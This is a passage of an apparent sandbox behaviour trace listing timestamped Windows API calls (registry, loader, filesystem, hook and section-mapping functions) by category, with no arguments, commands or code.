"RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,130", "api": "CreateThread"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExA"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,130", "api": "FindWindowW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,140", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,140", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,150", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,150", "api": "ZwMapViewOfSection"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": 